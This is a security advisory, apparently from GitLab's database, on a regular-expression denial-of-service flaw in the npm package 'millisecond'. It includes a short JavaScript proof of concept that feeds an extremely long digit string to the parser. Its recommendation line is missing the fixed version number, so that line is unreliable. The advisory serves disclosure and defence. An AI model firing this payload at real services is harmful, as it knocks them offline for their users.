GMS-2021-37: Regular Expression Denial of Service in millisecond
Versions of millisecond are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed. ## Proof of concept
var ms = require('millisecond');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
ms(genstr(process.argv[2], "5") + " minutea");
``` ## Recommendation
Update to or later.
References
Detect and mitigate GMS-2021-37 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →